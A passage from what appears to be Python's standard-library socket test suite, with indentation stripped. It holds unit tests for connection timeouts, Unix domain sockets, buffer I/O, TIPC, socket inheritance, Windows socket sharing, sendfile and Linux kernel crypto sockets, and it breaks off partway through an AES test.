# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
